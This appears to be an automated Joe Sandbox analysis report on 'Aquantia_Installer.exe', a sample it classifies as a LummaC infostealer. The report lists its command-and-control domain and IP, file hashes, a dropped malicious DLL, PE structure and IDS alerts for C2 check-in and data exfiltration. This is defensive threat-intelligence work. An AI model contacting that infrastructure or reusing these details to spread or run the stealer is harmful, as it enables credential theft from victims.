https://frogs-severz.sbs/api#O	aspnet_regiis.exe, 00000003.00000003.2161739316.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2175471255.0000000003158000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2162369698.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2230318456.000000000315E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2157876608.000000000315C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2222676551.000000000315C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	aspnet_regiis.exe, 00000003.00000003.2112354134.0000000003160000.00000004.00000020.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs:443/apiAA3GM0RssN1u2sTrQHh4TeOMDePHoCR3hPAm7IHnVLLUAAAAAADoAAAAACAAAgAAAAVG	aspnet_regiis.exe, 00000003.00000003.2089548297.0000000003131000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110834644.000000000312E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2110879604.0000000003131000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000003.00000003.2112094316.00000000057FF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000003.00000003.2068359954.000000000571A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2068280527.000000000571C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.155.47	frogs-severz.sbs	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561499
Start date and time:	2024-11-23 15:21:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Aquantia_Installer.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 29 Number of non-executed functions: 58
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Aquantia_Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
09:21:53	API Interceptor	9x Sleep call for process: aspnet_regiis.exe modified
09:22:26	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.155.47	arcaneloader.exe	Get hash	malicious	LummaC Stealer	Browse
172.67.155.47	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
frogs-severz.sbs	arcaneloader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	injector V2.5.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	SystemCoreHelper.dll	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	b.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.88.250
	file.exe	Get hash	malicious	LummaC Stealer	Browse	193.143.1.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.61
	S#U043eftWare.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	arcaneloader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.223.140
	unturnedHack.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	Unknown	Browse	104.21.70.128
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	S#U043eftWare.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	Call 0f Duty A1 Launcher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	arcaneloader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	file.exe	Get hash	malicious	Unknown	Browse	172.67.155.47
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	xLauncher.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.155.47

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Aquantia_Install_d8272d3c64971475476783cd1ff2ada06cb2e7d1_da6d3015_e869c00f-6e95-46d2-8541-892e62f6bf0b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9942277266542097
Encrypted:	false
SSDEEP:	192:UI5GTNyokkd0BU/qaGtizuiFlZ24IO8a:ITN1teBU/qaRzuiFlY4IO8a
MD5:	FA6935AEC8C341EF5E5C4A95F24411B2
SHA1:	194F424CF73089E519029A4583E860A7D6EAD359
SHA-256:	CDE7FC63B1325ACF76A7D36484BC8BC8D845EF6EEFBF446683D95DFAA10401AF
SHA-512:	BE8A12F5F0C2AECBA0F4892F6ADAA51D1F6761EE4F06EF4BA86E882A46802EBC655501F855487261A28D13FF11141DBE3DF37E529C2BCA918F4AF47BB7E2FDC5
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.4.5.3.1.4.1.5.5.2.1.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.4.5.3.1.5.7.3.3.3.3.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.6.9.c.0.0.f.-.6.e.9.5.-.4.6.d.2.-.8.5.4.1.-.8.9.2.e.6.2.f.6.b.f.0.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.4.2.a.e.f.e.-.6.4.6.9.-.4.5.a.e.-.9.a.e.2.-.7.9.0.3.b.0.1.5.8.e.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.q.u.a.n.t.i.a._.I.n.s.t.a.l.l.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.e.n.j.a.m.i.n.F.e.l.i.x.L.i.a.m...d.Y.Z.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.4.-.0.0.0.1.-.0.0.1.4.-.0.2.0.d.-.e.d.0.a.b.3.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.3.a.2.c.2.e.5.2.8.1.8.0.3.e.1.6.b.7.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1023.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Nov 23 14:21:54 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	194476
Entropy (8bit):	3.4287678272711135
Encrypted:	false
SSDEEP:	1536:5b2crpN4uE2aOiLIsLTgRI4CRN4DJJsCDAh/I3p:5a44uEqiLIsLTgRMv4DLAhA3
MD5:	9681EAAEBF315C0BA5D33FB4CD752A4A
SHA1:	868443E7C6C3C133E5823DC80D35C62F4C2BD625
SHA-256:	EA07D8BA7932A3DD7DA9CB5B891817D09E4F0906F8C4EE3D89EFD26524EACBEA
SHA-512:	9B03184C0BCC376925E61D1531CD456CC8220D88D7F495065DCB68EAC44158E2DEE8FDAA8ADDD322208544C98E39910FE7F09F47DFBD63E17BCE6F41F36CEB53
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........Ag............D...............X.......$................J..........`.......8...........T...........00..\|...........,............ ..............................................................................eJ....... ......GenuineIntel............T.............Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER114C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8454
Entropy (8bit):	3.7065098465604778
Encrypted:	false
SSDEEP:	192:R6l7wVeJ116Hzn+6YEIwSU9JTtjgmfZoY+prB89bY0sfDom:R6lXJn6HL+6YEfSU9JTtjgmfSYVYnf5
MD5:	5B13C4ADE9BB4FC4370F6049A30803F5
SHA1:	53DF1D133FBC23C4DDA8EA349DD4F35E7EE623B7
SHA-256:	0619CB53B55133627BBE0E29D78418E16CF8E1CCF81CA056C53F2A7CD720ACAD
SHA-512:	C3FCE1FDB0AE27427811120407D2E86CB4DB3274DCDA48968B3ACBD01F2A5EBDDEBE421296EB5BE9555698E914DF78FF0495FEF7C92FBD2F61907994CA36FCB5
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER116D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4825
Entropy (8bit):	4.529597210285371
Encrypted:	false
SSDEEP:	48:cvIwWl8zsMJg77aI9bgWpW8VYrYm8M4JrZCZX2FT0+q8vRZXr2yN5vZSvZSDwM5d:uIjfKI7ZZ7VHJrQpKRh2WvkvkL5d
MD5:	64EDA103786F201592891003F98814D5
SHA1:	55BBD9C6B73AF6D07E0CDFCFF653669DD34A62D2
SHA-256:	1308FDA4D265936CF2A4BBFAC8B0E7C41C59FD0EC03AF5F0CB3B7EB2D4EA101E
SHA-512:	A62745F593A3D0C778790F525B1E13A086BF62F2D850E9D3DFA582DDD85852CB4F30B40F04C6BFD38D898230BB7BC42EF8D3037940976B4CDA3969D4E6F00C25
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600804" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\Aquantia_Installer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	448512
Entropy (8bit):	7.105586821924797
Encrypted:	false
SSDEEP:	12288:1nsPelYT8O1TWCE1ungB9mUzU4h/xqH3x89vIP9O9dAWITkUlf0UahDcWHlxNz4v:oelYT8O1TWCE1ungB9mUzU4h/xqH3x8V
MD5:	CCB3799AE097D2AF5F0CB59D159AACF0
SHA1:	494A99A981C357B4D41376708D07D9B7C5E0ED7F
SHA-256:	B846FBFF65F0DE69586BC493F12ACD5405F5B564BDE51B312F1F7330584E722D
SHA-512:	B19F5BBE567856888BD977E6C87EEB5DE0B3368FB26F7AA9DFFBF6CE96490CF80FB91046FE30A151236A5BB63D3B674987A9856841383863991CBAC9151089A7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L....Ag...........!.........\......>.....................................................@.............................\|.......P...............................@...\...............................x...@...............T............................text...H........................... ..`.rdata...\.......^..................@..@.data...............................@....reloc..@...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422123795141498
Encrypted:	false
SSDEEP:	6144:sSvfpi6ceLP/9skLmb0OTVWSPHaJG8nAgeMZMMhA2fX4WABlEnND0uhiTwj:XvloTVW+EZMM6DFyh03wj
MD5:	C99B2FBA2E5307F5A7957CB25E955230
SHA1:	7A7CE9B62A52FBF73DB269B41C0117351143B8B6
SHA-256:	C6DDE9A287E8DFB3472DDD945E35247960119DEF7EF8B621EFFECBEDE928787F
SHA-512:	DD8F11E5A716D3C3A671278FE382622D3590C3E9F1153626147B72408E9691E7BE66FD6695158CFAFCE9FA2B032D9A5CCEA413D9ECF7769D9B5DBC61789EDFFE
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....=.................................................................................................................................................................................................................................................................................................................................................?........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\Aquantia_Installer.exe
File Type:	ASCII text, with very long lines (353), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1414
Entropy (8bit):	4.54425498097833
Encrypted:	false
SSDEEP:	24:7v74NuQMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T47Mff2p8p14nrPKktp
MD5:	A7E0E8BE42DE3949E142E8C195D1BAB5
SHA1:	C938F76FB3FBDDDA219A137F1DB1C357154E62B8
SHA-256:	F68A17425C0304311B9960F327492EC3DBB8E7F398DA9F0EEE5DDCC643D64751
SHA-512:	19764A4EDC2040176693566174555141E1E45EA2159A66D38B6BE939315218C65401561850E7B718EF23CF4B6B51711D3A6780455A1AD61E9C237C708B9A9954
Malicious:	false
Reputation:	low
Preview:	.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "BenjaminFelixLiam" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetStr

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.757226566069668
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Aquantia_Installer.exe
File size:	701'952 bytes
MD5:	a19287453762b8bed2b6a7ce68c413ca
SHA1:	3a2c2e5281803e16b7395aa02c2feede585acbf8
SHA256:	9cae15eb24885aae94012eba1f8cdfb39a08615f876897d8d056771e368b8a96
SHA512:	d7475ec1451da72793eaa1a7a12c2d3f4a30e2c5904ac834e03c91666cfc7fb7d74a2701e148dcab124b6b52e0fd652af4c36241da95219a227459518b9f7a9c
SSDEEP:	12288:OhYrnw0OYSSa6Hruex0S5AT6OYRbyA8Vd0lHx3vLrF5t8mpA+2L6osAtR5MkIzGB:OZEaWx0OOMnlHx395txpL2e
TLSH:	12E48DDC726072DFC867D472CEB82CA8EA91787B971F4617902706AD9A4C887CF151F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag..............0.............. ....... ....@.. .......................@............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4b200a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6741BFDD [Sat Nov 23 11:43:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [004B2000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8e6c4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xae000	0x650	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb2000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x8e000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
4mh:*	0x2000	0x8b438	0x8b600	4bf2897fe25283af3cb0ece1df396b52	False	1.0003170543721973	data	7.99971930966257	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x8e000	0x1ef68	0x1f000	2f3e3f19723daeeba0ad38d826e321e5	False	0.3296449722782258	data	4.694896891799402	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xae000	0x650	0x800	00811951e0718d5107c92dd2977b0f60	False	0.35205078125	data	3.5672348591962044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb0000	0xc	0x200	bb7ed6253917948e1428bb2330be1c86	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0xb2000	0x10	0x200	54eb1c345046b335ebf878fbe869c080	False	0.044921875	data	0.12227588125913882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xae0a0	0x3c4	data			0.4263485477178423
RT_MANIFEST	0xae464	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T15:21:56.676266+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	172.67.155.47	443	TCP
2024-11-23T15:21:57.563162+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	172.67.155.47	443	TCP
2024-11-23T15:21:57.563162+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	172.67.155.47	443	TCP
2024-11-23T15:21:58.960386+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	172.67.155.47	443	TCP
2024-11-23T15:21:59.681780+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49706	172.67.155.47	443	TCP
2024-11-23T15:21:59.681780+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	172.67.155.47	443	TCP
2024-11-23T15:22:01.305096+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	172.67.155.47	443	TCP
2024-11-23T15:22:03.441953+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	172.67.155.47	443	TCP
2024-11-23T15:22:05.594550+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49714	172.67.155.47	443	TCP
2024-11-23T15:22:08.097558+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	172.67.155.47	443	TCP
2024-11-23T15:22:08.867406+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49716	172.67.155.47	443	TCP
2024-11-23T15:22:10.655733+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49717	172.67.155.47	443	TCP
2024-11-23T15:22:14.603009+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49722	172.67.155.47	443	TCP
